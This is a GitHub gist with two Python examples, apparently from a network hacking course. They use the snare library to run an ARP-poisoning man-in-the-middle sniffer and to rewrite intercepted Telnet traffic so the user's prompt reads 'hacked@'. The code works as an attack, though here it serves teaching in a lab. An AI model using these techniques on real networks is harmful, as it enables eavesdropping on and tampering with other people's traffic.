Last active
May 23, 2023 01:30
-
-
Save nategraf/fa3482d8e04b8360bd0faac7a7eb24cb to your computer and use it in GitHub Desktop.
Snare examples 1 and 2 from Network Hacking 201
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import snare | |
def show_pkt(pkt): | |
print(pkt.summary()) | |
return pkt | |
sniffer = snare.Sniffer( | |
iface='tap0', | |
modules=[snare.ArpMitmModule(filter=show_pkt)] | |
) | |
sniffer.start() | |
# Here you will start to see packet summaries for intercepted traffic. | |
# When you want to stop the ARP poisoning attack and sniffer, run: | |
sniffer.stop() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import scapy.all as scapy | |
import snare | |
# Mark this as a TCP filter. Modified TCP packets returned from this function | |
# will have seq and ack numbers automatically adjusted. | |
@snare.tcpfilter | |
def telnet_filter(pkt): | |
# Only look at packets which have a TCP layer and a non-empty payload. | |
if not all(layer in pkt for layer in (scapy.IP, scapy.TCP, scapy.Raw)): | |
return pkt | |
# Print some information about the packet. Check Wireshark for the full details. | |
print(pkt.sprintf(f'%IP.src%:%TCP.sport% > %IP.dst%:%TCP.dport% {len(pkt[scapy.Raw].load)} bytes')) | |
# Check if packet is going from Telnet server to client. | |
if pkt[scapy.TCP].sport == 23: | |
# Replace the prompt shown to the user in the terminal. | |
# Instead of "piggy@", show "hacked@". | |
if b'piggy@' in pkt[scapy.Raw].load: | |
print('Replacing user prompt: HACKED!') | |
pkt[scapy.Raw].load = pkt[scapy.Raw].load.replace(b'piggy@', b'hacked@') | |
# Return the, possibly modified, packet for forwarding. | |
return pkt | |
sniffer = snare.Sniffer( | |
iface="tap0", | |
modules=[snare.ArpMitmModule(filter=telnet_filter)] | |
) | |
# Run the sniffer in blocking mode. | |
sniffer.run() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment